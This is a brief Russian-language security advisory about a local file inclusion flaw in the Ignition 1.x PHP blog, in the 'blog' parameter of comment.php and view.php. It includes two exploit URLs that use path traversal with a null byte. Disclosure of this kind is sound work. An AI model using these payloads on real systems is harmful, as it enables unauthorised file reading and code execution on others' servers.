Программа: Ignition 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "blog" сценариями comment.php и view.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00



Оставить мнение